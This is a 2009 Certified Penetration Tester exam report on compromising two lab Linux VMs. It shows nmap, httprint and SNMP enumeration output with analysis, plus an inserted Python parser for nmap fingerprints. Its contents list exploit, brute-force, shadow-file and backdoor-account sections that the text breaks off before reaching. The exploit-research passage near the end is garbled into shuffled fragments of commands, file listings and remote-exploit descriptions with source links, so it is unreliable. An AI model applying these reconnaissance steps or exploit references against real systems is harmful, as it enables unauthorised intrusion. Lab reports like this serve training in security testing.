Certified Penetration Tester (CPT) Practical Examination Report
Matthew Tiedeman
[email protected]
February 21st, 2009

Contents
1. Overview
2. Assumptions
3. Tools
4. Penetration test details
   A. Scanning
      i. Baseline scan of network
      ii. Port scanning and OS fingerprinting
      iii. Service fingerprinting - TCP services
      iv. Service fingerprinting - Validation of Apache HTTP service
      v. SNMP enumeration
      vi. Service fingerprinting - UDP services
   B. Sites used during the exploit research phase
   C. Remote exploits
      i. Research via anyside.org
      ii. Exploits – round 1
      iii. Research via secwatch.org
      iv. Exploits – round 2
   D. User discovery
      i. Abuse of finger
   E. Brute force password guessing
      i. Discovery of password for “user” account
      ii. Discovery of password for “cptvm1” and “cptvm2” accounts
   F. Research of cptvm1 and cptvm2 hosts
      i. cptvm1
      ii. cptvm2
   G. Penetration of cptvm1
      i. Local exploit research via anyside.org
      ii. Local exploit research via secwatch.org
      iii. Privilege escalation using a Kernel VMA exploit
      iv. Maintaining access via creation of a new “r00t” account
      v. Gathering the shadow password file
   H. Cracking passwords of the cptvm1 host
      i. Cracking of “user”, “cptvm1” and “cptvm2”
   I. Penetration of cptvm2
      i. Privilege escalation using a Kernel vmsplice exploit
      ii. Maintaining access via creation of a new “r00t” account
      iii. Gathering the shadow password file
   J. Cracking passwords of the cptvm2 host
      i. Cracking of “cptvm1”, “cptvm2”, “root” and “r00t”
   K. Cracking passwords of the cptvm1 host – round 2
      i. Cracking of “root” and “r00t”
   L. Ultimate goal
      i. cptvm1 and cptvm2 hosts compromised
      ii. Passwords for root accounts on cptvm1 and cptvm2
   M. Lessons learned
      i. Searching exploit sites
      ii. Attack vectors
5. Appendix
   A. Source code for the Kernel 2.4 VMA exploit
   B. Source code for the Kernel 2.6 vmsplice exploit

1. Overview

The certified pen tester practical examination consists of the compromising of two VMware virtual machines, the recovery of the root passwords for each system and the creation of a penetration report. The penetration report will contain, at a minimum, the details of all of the penetration test findings and a prioritized list of the vulnerabilities discovered. The penetration report should be submitted for review to: [email protected].

The following information was provided as part of the examination documentation:
- Virtual machine 1 (cptvm1) – VM containing a Linux system.
  - The system has the following static configuration:
    - IP Address: 192.168.1.200
    - Netmask: 255.255.255.0
    - Gateway: 192.168.1.254
    - DNS: 192.168.1.254
- Virtual machine 2 (cptvm2) – VM containing a Linux system.
  - The system has been configured to gain its network information via DHCP.
- Information gathered from one of the VMs during the penetration test may be required in order to compromise the other VM.

2. Assumptions

- While the penetration testing process consists of the phases reconnaissance, scanning, fingerprinting, penetration, maintaining connectivity and covering tracks, the reconnaissance and covering tracks phases will not be covered within this report.
- Stealthy scanning and penetration techniques will not be used.

3. Tools

The following tools were used during the completion of the penetration testing practical examination.
- Apple OSX – Host operating system used to execute VMware Fusion.
- VMware Fusion – VMware virtual host software for OSX.
- back|track3 – Collection of penetration tester utilities.
- nmap – Port scanning, fingerprinting, “swiss army knife” utility.
- httprint – HTTP fingerprinting utility.
- snmpenum.pl – SNMP enumeration utility.
- finger – Finger utility.
- hydra – Multiple protocol dictionary attack utility.
- John the ripper – password cracker.
- aspell – Dictionary utility.
- tftp – Trivial File Transfer Protocol client.
- ssh – Secure shell client.
- gcc – C, etc. compiler.
- vi – Text editor.
- emacs – A “swiss army knife” editor (text/source code/etc).
- awk – Lightweight regular expression text scripting utility.
- sed – A stream editing utility.
- sort – Unix text sort utility.
- bash shell scripting – Small scripts and main interactive shell.

4. Penetration test details

A. Scanning

i. Baseline scan of network

An initial scan of the network was performed to establish a baseline of the network configuration.

bt live # nmap -sP -n 192.168.1.1/24

Starting Nmap 4.60 ( http://nmap.org ) at 2009-01-19 07:59 GMT
Host 192.168.1.1 appears to be up.
MAC Address: XX:XX:XX:XX:XX:XX (Cisco-Linksys)
Host 192.168.1.30 appears to be up.
MAC Address: XX:XX:XX:XX:XX:XX (Apple Computer)
Host 192.168.1.102 appears to be up.
MAC Address: XX:XX:XX:XX:XX:XX (Apple Computer)
Host 192.168.1.104 appears to be up.
MAC Address: 00:0C:29:3B:43:BC (VMware)
Host 192.168.1.200 appears to be up.
MAC Address: 00:0C:29:27:60:0A (VMware)
Nmap done: 256 IP addresses (4 hosts up) scanned in 3.269 seconds

From the information gathered during this step, the identification of the hosts and their use comes mainly from the exam documentation and the knowledge of how the local network is configured. The gateway (192.168.1.1), back|track3 (192.168.1.30), the host computer (192.168.1.102), cptvm2 (192.168.1.104) and cptvm1 (192.168.1.200) were identified. The two VMware MAC address prefixes (00:0C:29) are what single out the two VMs among the hosts that answered. At this point, the systems of interest are configured as follows:

cptvm1 (192.168.1.200)
cptvm2 (192.168.1.104)

ii. Port scanning and OS fingerprinting

To determine the open ports and host operating system, a port scan and OS fingerprint of the specific VM IP addresses was conducted. The port scan included all TCP ports from 1 to 65535. Due to the differences between TCP and UDP, the UDP scan was completed only on ports from 1 to 1024.

bt live # nmap -sS -O -n -p1-65535 192.168.1.200 192.168.1.104

Starting Nmap 4.60 ( http://nmap.org ) at 2009-01-20 12:04 GMT
Interesting ports on 192.168.1.200:
Not shown: 65517 closed ports
PORT      STATE SERVICE
7/tcp     open  echo
21/tcp    open  ftp
22/tcp    open  ssh
23/tcp    open  telnet
79/tcp    open  finger
80/tcp    open  http
109/tcp   open  pop2
110/tcp   open  pop3
111/tcp   open  rpcbind
143/tcp   open  imap
199/tcp   open  smux
443/tcp   open  https
686/tcp   open  unknown
993/tcp   open  imaps
995/tcp   open  pop3s
6000/tcp  open  X11
32768/tcp open  unknown
32770/tcp open  sometimes-rpc3
MAC Address: 00:0C:29:27:60:0A (VMware)
Device type: general purpose
Running: Linux 2.4.X
OS details: Linux 2.4.18 - 2.4.32 (likely embedded)
Uptime: 0.121 days (since Tue Jan 20 09:11:03 2009)
Network Distance: 1 hop

Interesting ports on 192.168.1.104:
Not shown: 65532 closed ports
PORT    STATE SERVICE
22/tcp  open  ssh
111/tcp open  rpcbind
939/tcp open  unknown
MAC Address: 00:0C:29:3B:43:BC (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS details: Linux 2.6.9 - 2.6.23
Uptime: 0.106 days (since Tue Jan 20 09:32:16 2009)
Network Distance: 1 hop

OS detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 2 IP addresses (2 hosts up) scanned in 19.321 seconds

bt live # nmap -sU -T5 -n -p1-1024 192.168.1.200 192.168.1.104

Starting Nmap 4.60 ( http://nmap.org ) at 2009-01-20 15:53 GMT
Warning: Giving up on port early because retransmission cap hit.
Stats: 0:00:20 elapsed; 0 hosts completed (2 up), 2 undergoing UDP Scan
UDP Scan Timing: About 22.18% done; ETC: 15:54 (0:01:11 remaining)
Stats: 0:00:22 elapsed; 0 hosts completed (2 up), 2 undergoing UDP Scan
UDP Scan Timing: About 24.37% done; ETC: 15:54 (0:01:09 remaining)
Stats: 0:00:22 elapsed; 0 hosts completed (2 up), 2 undergoing UDP Scan
UDP Scan Timing: About 24.89% done; ETC: 15:54 (0:01:08 remaining)
Stats: 0:00:23 elapsed; 0 hosts completed (2 up), 2 undergoing UDP Scan
UDP Scan Timing: About 25.05% done; ETC: 15:54 (0:01:08 remaining)
Interesting ports on 192.168.1.200:
Not shown: 870 open|filtered ports, 151 closed ports
PORT   STATE SERVICE
7/udp  open  echo
13/udp open  daytime
37/udp open  time
MAC Address: 00:0C:29:27:60:0A (VMware)

All 1024 scanned ports on 192.168.1.104 are open|filtered (872) or closed (152)
MAC Address: 00:0C:29:3B:43:BC (VMware)

Nmap done: 2 IP addresses (2 hosts up) scanned in 146.229 seconds

A UDP port that never answers is reported by nmap as open|filtered, not open, and the -T5 timing together with the retransmission cap gives up on a port after very few probes. The 870 such ports on cptvm1 and all 1024 on cptvm2 are therefore unresolved rather than confirmed open; for cptvm1 the SNMP enumeration and the UDP version scan in steps v and vi are what settle the ports that matter.

Based upon the list of open ports, it can be concluded that cptvm1, 192.168.1.200, is most likely a server, while cptvm2, 192.168.1.104, is most likely a client workstation.

From the information gathered during this step, the systems of interest are configured as follows:

cptvm1 (192.168.1.200)
  Operating system: Linux
  Kernel version: Linux 2.4.18 - 2.4.32
  TCP ports: 7, 21, 22, 23, 79, 80, 109, 110, 111, 143, 199, 443, 686, 993, 995, 6000, 32768, 32770
  UDP ports: 7, 13, 37

cptvm2 (192.168.1.104)
  Operating system: Linux
  Kernel version: Linux 2.6.9 - 2.6.23
  TCP ports: 22, 111, 939

iii. Service fingerprinting - TCP services

As a TCP port number does not directly identify a service, fingerprinting of the services listening on the ports is required. The majority of the TCP services were fingerprinted via nmap. The remaining services, port 109, port 993 and port 995, will require further research to properly fingerprint.

bt live # nmap -sV --version-all -n -p7,21,22,23,79,80,109,110,111,143,199,443,686,993,995,6000,32768,32770 192.168.1.200

Starting Nmap 4.60 ( http://nmap.org ) at 2009-01-20 12:27 GMT
Interesting ports on 192.168.1.200:
PORT      STATE SERVICE    VERSION
7/tcp     open  echo
21/tcp    open  ftp        vsftpd 1.1.3
22/tcp    open  ssh        OpenSSH 3.5p1 (protocol 1.99)
23/tcp    open  telnet     Linux telnetd
79/tcp    open  finger     Linux fingerd
80/tcp    open  http       Apache httpd 2.0.40 ((Red Hat Linux))
109/tcp   open  pop2?
110/tcp   open  pop3       ipopd 2001.78rh
111/tcp   open  rpcbind    2 (rpc #100000)
143/tcp   open  imap       UW Imapd 2001.315rh
199/tcp   open  smux       Linux SNMP multiplexer
443/tcp   open  ssl/http   Apache httpd 2.0.40 ((Red Hat Linux))
686/tcp   open  rquotad    1-2 (rpc #100011)
993/tcp   open  imaps?
995/tcp   open  pop3s?
6000/tcp  open  X11        (access denied)
32768/tcp open  status     1 (rpc #100024)
32770/tcp open  mountd     1-3 (rpc #100005)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port109-TCP:V=4.60%I=9%D=1/20%Time=4975C33E%P=i686-pc-linux-gnu%r(Gener
SF:icLines,"\+\x20POP2\x20\[192\.168\.1\.200\]\x20v2001\.63rh\x20server
SF:\x20ready\r\n-\x20Missing\x20or\x20null\x20command\r\n")%r(Verifier,"\+
SF:\x20POP2\x20\[192\.168\.1\.200\]\x20v2001\.63rh\x20server\x20ready\r
SF:\n-\x20Bogus\x20or\x20out\x20of\x20sequence\x20command\x20-\x20SUBSCRIB
SF:E\r\n");
MAC Address: 00:0C:29:27:60:0A (VMware)
Service Info: Host: 192.168.1.200; OSs: Unix, Linux

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 225.358 seconds

Although nmap could not match port 109 against its signature database, the captured fingerprint is readable once the \x20 escapes are decoded: the service greets with “+ POP2 [192.168.1.200] v2001.63rh server ready”, which is a POP2 greeting carrying the same Red Hat (rh) build suffix as the ipopd 2001.78rh on port 110 and the UW Imapd 2001.315rh on port 143. The “pop2?” guess is therefore well supported. Ports 993 and 995 answered nothing useful because they expect a TLS handshake that this version scan did not perform.

bt live # nmap -sV --version-all -n -p22,111,939 192.168.1.104

Starting Nmap 4.60 ( http://nmap.org ) at 2009-01-20 12:33 GMT
Interesting ports on 192.168.1.104:
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 4.3 (protocol 2.0)
111/tcp open  rpcbind 2 (rpc #100000)
939/tcp open  status  1 (rpc #100024)
MAC Address: 00:0C:29:3B:43:BC (VMware)

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.977 seconds

From the information gathered during this step, the systems of interest are configured as follows:

cptvm1 (192.168.1.200)
  Operating system: Linux
  Kernel version: Linux 2.4.18 - 2.4.32
  TCP ports: 7, 21, 22, 23, 79, 80, 109, 110, 111, 143, 199, 443, 686, 993, 995, 6000, 32768, 32770
  UDP ports: 7, 13, 37
  TCP services:
    7/tcp     echo
    21/tcp    ftp        vsftpd 1.1.3
    22/tcp    ssh        OpenSSH 3.5p1 (protocol 1.99)
    23/tcp    telnet     Linux telnetd
    79/tcp    finger     Linux fingerd
    80/tcp    http       Apache httpd 2.0.40 (Red Hat Linux)
    109/tcp   POSSIBLY pop2
    110/tcp   pop3       ipopd 2001.78rh
    111/tcp   rpcbind    2 (rpc #100000)
    143/tcp   imap       UW Imapd 2001.315rh
    199/tcp   smux       Linux SNMP multiplexer
    443/tcp   ssl/http   Apache httpd 2.0.40 (Red Hat Linux)
    686/tcp   rquotad    1-2 (rpc #100011)
    993/tcp   imaps
    995/tcp   pop3s
    6000/tcp  X11
    32768/tcp status     1 (rpc #100024)
    32770/tcp mountd     1-3 (rpc #100005)

cptvm2 (192.168.1.104)
  Operating system: Linux
  Kernel version: Linux 2.6.9 - 2.6.23
  TCP ports: 22, 111, 939
  TCP services:
    22/tcp  ssh     OpenSSH 4.3 (protocol 2.0)
    111/tcp rpcbind 2 (rpc #100000)
    939/tcp status  1 (rpc #100024)
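The unrecognized-service fingerprint that nmap printed for port 109 is easier to judge once its escaped bytes are decoded. The parser below is an added example and is not part of the original report or of nmap; it takes the SF-Port109-TCP block as the report shows it (the hexadecimal response-length field nmap normally prints after each probe name is absent from the copy on this page, so the parser treats it as optional) and returns the probe names, the decoded responses and the fingerprint timestamp, which is a hexadecimal Unix time. The sample input is the fingerprint from the scan above, embedded verbatim.

```python
import re
from datetime import datetime, timezone

# Service fingerprint for 109/tcp as printed by nmap 4.60 in the scan above
# (copied from the report; the "SF:" prefixes are nmap's own line continuation).
SF_PORT109 = r"""
SF-Port109-TCP:V=4.60%I=9%D=1/20%Time=4975C33E%P=i686-pc-linux-gnu%r(Gener
SF:icLines,"\+\x20POP2\x20\[192\.168\.1\.200\]\x20v2001\.63rh\x20server
SF:\x20ready\r\n-\x20Missing\x20or\x20null\x20command\r\n")%r(Verifier,"\+
SF:\x20POP2\x20\[192\.168\.1\.200\]\x20v2001\.63rh\x20server\x20ready\r
SF:\n-\x20Bogus\x20or\x20out\x20of\x20sequence\x20command\x20-\x20SUBSCRIB
SF:E\r\n");
""".strip()

# Escapes nmap uses inside the quoted response string.  Anything else that
# follows a backslash is a regex metacharacter nmap escaped (\. \+ \[ ...),
# which decodes to the character itself.
_SIMPLE_ESCAPES = {"n": "\n", "r": "\r", "t": "\t", "0": "\0", "\\": "\\", '"': '"'}

# %r(ProbeName,<optional hex length>,"response")
_RESPONSE_RE = re.compile(r'%r\((\w+),(?:[0-9A-Fa-f]+,)?"((?:[^"\\]|\\.)*)"\)')


def unescape(s: str) -> str:
    """Decode one nmap fingerprint response string into the bytes it carried."""
    out, i = [], 0
    while i < len(s):
        c = s[i]
        if c != "\\":
            out.append(c)
            i += 1
            continue
        nxt = s[i + 1]
        if nxt == "x":                      # \xHH
            out.append(chr(int(s[i + 2:i + 4], 16)))
            i += 4
        else:                               # \n \r \t \0 \\ \" or an escaped metachar
            out.append(_SIMPLE_ESCAPES.get(nxt, nxt))
            i += 2
    return "".join(out)


def parse_fingerprint(text: str) -> dict:
    """Join the SF-/SF: lines and split them into port, header fields and responses."""
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    joined = lines[0][len("SF-"):] + "".join(ln[len("SF:"):] for ln in lines[1:])
    port_spec, rest = joined.split(":", 1)
    port, proto = re.match(r"Port(\d+)-(\w+)", port_spec).groups()
    header = rest.split("%r(", 1)[0]        # V=...%I=...%D=...%Time=...%P=...
    fields = dict(kv.split("=", 1) for kv in header.split("%") if "=" in kv)
    responses = {name: unescape(body) for name, body in _RESPONSE_RE.findall(rest)}
    return {"port": int(port), "proto": proto, "fields": fields, "responses": responses}


def fingerprint_time(fp: dict) -> datetime:
    """The Time field is the Unix time of the probe, in hexadecimal."""
    return datetime.fromtimestamp(int(fp["fields"]["Time"], 16), tz=timezone.utc)


def greeting(fp: dict) -> str:
    """First line the service sent in response to the first probe."""
    first = next(iter(fp["responses"].values()))
    return first.splitlines()[0]


if __name__ == "__main__":
    fp = parse_fingerprint(SF_PORT109)
    print(f"{fp['port']}/{fp['proto'].lower()} probed at {fingerprint_time(fp):%Y-%m-%d %H:%M:%S} UTC")
    for probe, reply in fp["responses"].items():
        print(f"  {probe}: {reply!r}")
```

The decoded timestamp (12:27:42 UTC on 2009-01-20) lines up with the 12:27 GMT start of the version scan, which is a useful sanity check when fingerprints are pasted around without their scan context. Nothing in the decoded responses beyond the greeting and two error strings is needed to see that the daemon calls itself POP2.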
iv. Service fingerprinting - Validation of Apache HTTP service

Often the banner for a web server is disguised to hide the true web server that is running. The httprint utility was utilized to ensure that the web server is actually Apache. In this case, the use of the Apache web server was validated.

bt linux # httprint -h 192.168.1.200 -s signatures.txt
httprint v0.301 (beta) - web server fingerprinting tool
(c) 2003-2005 net-square solutions pvt. ltd. - see readme.txt
http://net-square.com/httprint/
[email protected]

Finger Printing on http://192.168.1.200:80/
Finger Printing Completed on http://192.168.1.200:80/
--------------------------------------------------
Host: 192.168.1.200
Derived Signature:
Apache/2.0.40 (Red Hat Linux)
9E431BC86ED3C295811C9DC5811C9DC5811C9DC5505FCFE84276E4BB811C9DC5
0D7645B5811C9DC52A200B4CCD37187C11DDC7D7811C9DC5811C9DC58A91CF57
FCCC535BE2CE6920FCCC535B811C9DC5E2CE6927050C5D33E2CE69279E431BC8
6ED3C295E2CE69262A200B4CE2CE6920E2CE6920E2CE6920E2CE6920E2CE6923
E2CE6923E2CE6920811C9DC5E2CE6927E2CE6923

Banner Reported: Apache/2.0.40 (Red Hat Linux)
Banner Deduced: Apache/2.0.x
Score: 106
Confidence: 63.86
------------------------
Scores:
Apache/2.0.x: 106 63.86
(followed by the lower-scoring entries of the signature table: the Apache/1.3.x variants, TUX/2.0 (Linux), Netscape-Enterprise, Microsoft-IIS, Apache-Tomcat and the remaining signatures from signatures.txt, each with its score and confidence; the original table ran to more than a hundred rows and is not reproduced here)

The deduced signature Apache/2.0.x has a wide margin over the next candidates, so the Server header is not being rewritten; together with the “(Red Hat Linux)” banner string and the “rh” suffixes on the mail daemons, this points to a Red Hat build of the software.

v. SNMP enumeration

The snmp service was identified as listening on port 199/tcp of the cptvm1 host. In addition, the cptvm1 host OS was identified as Linux. With these two factors in mind, the snmpenum.pl utility can be utilized to gather system information. Port 199/tcp (smux) is the agent's multiplexer port; the agent itself answers SNMP queries on 161/udp, which is what snmpenum.pl talks to, and it accepted the default community string “public”.

bt snmpenum # snmpenum.pl 192.168.1.200 public linux.txt

----------------------------------------
HOSTNAME
----------------------------------------
cptvm1
----------------------------------------
UPTIME
----------------------------------------
1 hour, 40:22.46
----------------------------------------
RUNNING SOFTWARE PATHS
----------------------------------------
init
keventd
kapmd
ksoftirqd_CPU0
kswapd
kscand/DMA
kscand/Normal
kscand/HighMem
bdflush
----------------------------------------
RUNNING PROCESSES
----------------------------------------
init
keventd
kapmd
ksoftirqd_CPU0
kswapd
kscand/DMA
kscand/Normal
kscand/HighMem
bdflush
----------------------------------------
MOUNTPOINTS
----------------------------------------
/
/proc/bus/usb
/boot
/dev/shm
Real Memory
Swap Space
Memory Buffers
----------------------------------------
SYSTEM INFO
----------------------------------------
Linux cptvm1 2.4.20-8 #1 Thu Mar 13 17:54:28 EST 2003 i686
----------------------------------------
LISTENING UDP PORTS
----------------------------------------
7
13
37
111
123
161
162
631
683
----------------------------------------
LISTENING TCP PORTS
----------------------------------------
7
21
22
23
79
80
109
110
111

From the information gathered during this step, various process and service information was discovered. The SYSTEM INFO string narrows the kernel from nmap's 2.4.18 - 2.4.32 range to the exact build, 2.4.20-8, which is what the local exploit research later relies on. Of particular interest are the UDP services currently running on the host: along with UDP ports 7, 13 and 37 found by the port scan, ports 111, 123, 161, 162, 631 and 683 are listening.

cptvm1 (192.168.1.200)
  Operating system: Linux
  Kernel version: 2.4.20-8
  TCP ports: 7, 21, 22, 23, 79, 80, 109, 110, 111, 143, 199, 443, 686, 993, 995, 6000, 32768, 32770
  UDP ports: 7, 13, 37, 111, 123, 161, 162, 631, 683
  TCP services:
    7/tcp     echo
    21/tcp    ftp        vsftpd 1.1.3
    22/tcp    ssh        OpenSSH 3.5p1 (protocol 1.99)
    23/tcp    telnet     Linux telnetd
    79/tcp    finger     Linux fingerd
    80/tcp    http       Apache httpd 2.0.40 (Red Hat Linux)
    109/tcp   POSSIBLY pop2
    110/tcp   pop3       ipopd 2001.78rh
    111/tcp   rpcbind    2 (rpc #100000)
    143/tcp   imap       UW Imapd 2001.315rh
    199/tcp   smux       Linux SNMP multiplexer
    443/tcp   ssl/http   Apache httpd 2.0.40 (Red Hat Linux)
    686/tcp   rquotad    1-2 (rpc #100011)
    993/tcp   imaps
    995/tcp   pop3s
    6000/tcp  X11
    32768/tcp status     1 (rpc #100024)
    32770/tcp mountd     1-3 (rpc #100005)

cptvm2 (192.168.1.104)
  Operating system: Linux
  Kernel version: Linux 2.6.9 - 2.6.23
  TCP ports: 22, 111, 939
  TCP services:
    22/tcp  ssh     OpenSSH 4.3 (protocol 2.0)
    111/tcp rpcbind 2 (rpc #100000)
    939/tcp status  1 (rpc #100024)

vi. Service fingerprinting - UDP services

Like TCP ports, UDP ports do not directly identify services. Therefore, the services listening on the UDP ports will need to be fingerprinted. All UDP services except port 631 were properly fingerprinted.

bt linux # nmap -sU -sV --version-all -n -p7,13,37,111,123,161,162,631,683 192.168.1.200

Starting Nmap 4.60 ( http://nmap.org ) at 2009-01-20 12:54 GMT
Interesting ports on 192.168.1.200:
PORT    STATE         SERVICE  VERSION
7/udp   open          echo
13/udp  open          daytime
37/udp  open          time     (32 bits)
111/udp open          rpcbind  2 (rpc #100000)
123/udp open|filtered ntp
161/udp open          snmp     SNMPv1 server (public)
162/udp open|filtered snmptrap
631/udp open|filtered unknown
683/udp open          rquotad  1-2 (rpc #100011)
MAC Address: 00:0C:29:27:60:0A (VMware)

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 51.467 seconds

From the information gathered during this step, the systems of interest are configured as follows:

cptvm1 (192.168.1.200)
  Operating system: Linux
  Kernel version: 2.4.20-8
  TCP ports: 7, 21, 22, 23, 79, 80, 109, 110, 111, 143, 199, 443, 686, 993, 995, 6000, 32768, 32770
  UDP ports: 7, 13, 37, 111, 123, 161, 162, 631, 683
  TCP services:
    7/tcp     echo
    21/tcp    ftp        vsftpd 1.1.3
    22/tcp    ssh        OpenSSH 3.5p1 (protocol 1.99)
    23/tcp    telnet     Linux telnetd
    79/tcp    finger     Linux fingerd
    80/tcp    http       Apache httpd 2.0.40 (Red Hat Linux)
    109/tcp   POSSIBLY pop2
    110/tcp   pop3       ipopd 2001.78rh
    111/tcp   rpcbind    2 (rpc #100000)
    143/tcp   imap       UW Imapd 2001.315rh
    199/tcp   smux       Linux SNMP multiplexer
    443/tcp   ssl/http   Apache httpd 2.0.40 (Red Hat Linux)
    686/tcp   rquotad    1-2 (rpc #100011)
    993/tcp   imaps
    995/tcp   pop3s
    6000/tcp  X11
    32768/tcp status     1 (rpc #100024)
    32770/tcp mountd     1-3 (rpc #100005)
  UDP services:
    7/udp   echo
    13/udp  daytime
    37/udp  time     (32 bits)
    111/udp rpcbind  2 (rpc #100000)
    123/udp ntp
    161/udp snmp     SNMPv1 server (public)
    162/udp snmptrap
    631/udp unknown
    683/udp rquotad  1-2 (rpc #100011)

cptvm2 (192.168.1.104)
  Operating system: Linux
  Kernel version: Linux 2.6.9 - 2.6.23
  TCP ports: 22, 111, 939
  TCP services:
    22/tcp  ssh     OpenSSH 4.3 (protocol 2.0)
    111/tcp rpcbind 2 (rpc #100000)
    939/tcp status  1 (rpc #100024)

B. Sites used during the exploit research phase

There are various sites available for the research of software exploits. While the following list is not all inclusive, it does provide fairly good coverage:
- http://anyside.org/ – Exploits database.
- http://www.milw0rm.com/ – Exploits database.
- http://packetstormsecurity.org/ – Exploits database.
- http://secwatch.org/exploits.php – Exploit information.
- http://www.securiteam.com/exploits/ – Exploits information.
- http://www.securityforest.com/ – Exploits database and securityforest exploits update script.
- http://www.remote-exploit.org/ – Contains back|track, milw0rm and securityfocus exploit update scripts.
- http://www.brandonhutchinson.com/ – Contains packetstormsecurity exploits update script.
- http://www.iss.net/ – Exploits information.
- http://www.governmentsecurity.org/ – Exploits information.
- http://www.hoobie.net/security/exploits/ – Exploits information.
- http://insecure.org/sploits.html – Exploit information.
- http://www.vupen.com/exploits/ – Archive of private exploits and proof-of-concept codes developed by VUPEN Security.
- http://www.illmob.org/ – Exploit information.
- http://www.datastronghold.com – Exploit information and hacking techniques.
- http://www.malware.com – Exploit information.
- http://www.security-protocols.com/ – Security advisories.
- http://www.immunitysec.com/index.shtml – Exploit platform.
- http://metasploit.com/ – Exploit platform.
Research via anyside.Exploits information.txt | grep -w -i -f .c.Remote Windows exploit for the RPC DCOM long filename heap overflow discovered by NSFOCUS..anyside.immunitysec.security-protocols.org/ .org/exp/exploits/remote/101_ncat.com/ .org/exp/exploits/remote/09. http://metasploit.Exploit information. http://www.txt .malware.com ./ Feb 6 14:40 exploits_list.txt $ ll total 1664 drwxr-xr-x drwxr-xr-x -rw-r--r--rw-r--r--rw-r--r-- 6 16 1 1 1 matt matt matt matt matt matt matt matt matt matt 204 544 126720 702666 9376 Feb 21 14:46 .com – Exploit information and hacking techniques.tgz Sep 21 05:52 exploits_list.txt Feb 6 14:43 possible_remote_200. The list consisted of a small description of the exploit and a link to the source code for the exploit. Related advisory ...org – Exploit platform.txt $ cat possible_remote_200. http://www.txt apache finger imap ipop ntp open ssh openssh rpc rpcbind rpcmount rpcstatus rquota snmp snmptrap telnet vs ftp vsftp x11 The search items list and the exploit list were used to gain a list of possible remote exploits for the cptvm1 host..datastronghold..c.http://www.anyside..4 .MS03-039-exp../commands/remotesearch. C..http://www..16. Remote Buffer Overflow Exploit v0.MailEnable .db. IMAP Service. $ cat . $ grep exploits\/remote exploits_list./ Feb 21 14:46 . .anyside.3 and 2.Remote buffer overflow in MDaemon IMAP and SMTP server 2004-9-3.3..6.anyside.7 Remote Buffer Overflow Exploit 2005-04-25.. and 8 telnetd remote exploit.http://www.52 and earlier DoS .Snmppd SNMP proxy daemon format string exploit .GoodTech Telnet Server < 5.org/exp/exploits/remote/apache-squ1rt.c.c..anyside.. Binds cmd.Exploit that makes use of the mod_userdir vulnerability in various Apache 1..anyside.0.http://www. 7. 2003-12-8. Tested against OverflowGuard and StackDefender (with kernel32 imagebase randomization) running on Windows 2000 SP0 and Windows XP SP0.http://www.. 
2004-4-25...c..Remote root exploit for rpc..0.Remote exploit for Apache + OpenSSL v0.org/exp/exploits/remote/mounty..http://www.http://www. Tested again Windows 2000 SP3 and Windows NT 4 SP6a.c...txt. This exploit is based upon the openssl-too-open exploit by Solar Eclipse and offers more than 130 targets including various flavors of Linux.9.org/exp/exploits/remote/wts_bo.http://www.ADM mountd exploit .txt.Checks Apache webservers for a wrong default configuration of mod_userdir which allows account name guessing and then attempts to login to the found accounts with ftp.http://www.c.anyside.http://www.org/exp/exploits/remote/Snmppd.Denial of service test exploit for the flaw in Apache httpd 2.c.c.= 2.. Tested on Win32 and Unix..Windows remote rpc dcom exploit which bypasses non-executable stack protection by using return into libc.c.49 ..org/exp/exploits/remote/ADMmountd. Includes targets for Windows 2000 and XP.. .mountd 2.Solaris 2.http://www.48 remote users disclosure exploit .MS04011 Lsasrv.......org/exp/exploits/remote/goodtech_expl.anyside.txt.x servers.anyside.http://www. 2003-9-18.Remote exploit utilizing the DCOM RPC overflow discovered by LSD...6d and below. Effective against Linux and *BSD boxes.anyside.c.org/exp/exploits/remote/wgetusr.http://www. ..anyside.gz.anyside.2-r1 auth_debug() Remote Format String Exploit 2005-03-17.c..Microsoft Windows RPC Locator Service remote exploit..http://www.org/exp/exploits/remote/goodtech.7 Remote BoF Exploit 2005-04-30...Jordan Windows Telnet Server v1..3 and 2.c..http://www.dll RPC ms04011 buffer overflow Remote Exploit 2004-5-2..txt.0...http://www.Ipswitch IMAP Server "LOGIN" Command Remote Stack Overflow Exploit .Apache <.c.org/exp/exploits/remote/sm00nycourier_imap_fsx.Linux rpc.Courier-IMAP <..mountd that makes use of the xlog off-by-one vulnerability discussed 2004-1-4.http://www.org/exp/exploits/remote/lsasrv.0.Windows Lsasrv.org/exp/exploits/remote/apache_xpl.0. 
Binds a shell on port 4444.org/exp/exploits/remote/MercuryMail-exp.anyside..org/exp/exploits/remote/HOD-ms04011-lsasrvexpl.c... ..anyside.Exploit code for the Mercury32 IMAP Rename buffer overflow .c.org/exp/exploits/remote/m00-apache-w00t.anyside.anyside.*-2.c.http://www.org/exp/exploits/remote/rpcexp..anyside.http://www.http://www.tar.c.dll RPC buffer overflow remote exploit 2004-9-24.anyside.http://www..anyside..0.c.http://www.= 3.3.anyside.52 HTTP GET Remote Denial of Service Exploit .http://www.org/exp/exploits/remote/telnet.org/exp/exploits/remote/OpenFuckV2...http://www.*-2.. ...anyside.org/exp/exploits/remote/m00-apache-w00t.anyside.http://www.http://www.. Binds a shell on port 9191..2beta29 remote root exploit ..http://www..org/exp/exploits/remote/dcom.Windows port of the remote exploit utilizing the DCOM RPC overflow originally coded by H D Moore..0.org/exp/exploits/remote/DComExpl_UnixWin32..org/exp/exploits/remote/getusr..0.anyside.c.01 (Pegasus) IMAP Buffer Overflow .org/exp/exploits/remote/rpc!exec.Apache 1.Exploit that makes use of the mod_userdir vulnerability in various Apache 1.anyside.anyside.zip. .anyside.org/exp/exploits/remote/ipswitch..http://www.GoodTech Telnet Server < 5.org/exp/exploits/remote/mdaemon_imap.x servers..c.2 remote buffer overflow exploit.anyside. .48 mod_userdir remote users disclosure Exploit 2003-4-1..Apache 2.c.org/exp/exploits/remote/Mercury-IMAP-exp. ..org/exp/exploits/remote/httpdDoS-pl.anyside.Mercury Mail 4.exe to port 5151.Apache 1.. 
